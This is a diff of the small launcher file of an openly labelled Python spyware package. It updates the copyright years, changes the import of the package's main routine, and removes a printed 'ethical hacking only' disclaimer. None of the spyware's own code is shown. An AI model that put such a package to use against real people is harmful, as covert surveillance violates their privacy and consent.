@@ -1,11 +1,13 @@
 #!/usr/bin/env python3
 # -*- coding: utf-8 -*-
 
-""" This package implement a spyware. """
+"""
+This package implements a spyware.
+"""
 
 ###################
-#    This package implement a spyware.
-#    Copyright (C) 2021  Maurice Lambert
+#    This package implements a spyware.
+#    Copyright (C) 2021, 2022  Maurice Lambert
 
 #    This program is free software: you can redistribute it and/or modify
 #    it under the terms of the GNU General Public License as published by
@@ -21,14 +23,9 @@
 #    along with this program.  If not, see <https://www.gnu.org/licenses/>.
 ###################
 
-print("""
-Do not use this package for any ILLEGAL action.
-I am creating this package for ETHICAL hacking.
-""")
-
 print(
     """
-SpyWare  Copyright (C) 2021  Maurice Lambert
+SpyWare  Copyright (C) 2021, 2022  Maurice Lambert
 This program comes with ABSOLUTELY NO WARRANTY.
 This is free software, and you are welcome to redistribute it
 under certain conditions.
@@ -36,8 +33,8 @@ under certain conditions.
 )
 
 try:
-    from spyware import spyware
+    from SpyWare import main
 except ImportError:
-    from .spyware import spyware
+    from .SpyWare import main
 
-spyware()
\ No newline at end of file
+main()
